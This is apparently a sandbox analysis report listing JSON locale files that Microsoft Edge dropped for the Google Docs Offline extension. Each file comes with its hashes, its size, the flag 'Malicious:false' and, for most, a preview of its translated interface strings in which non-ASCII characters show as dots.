                                                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                          Malicious:false
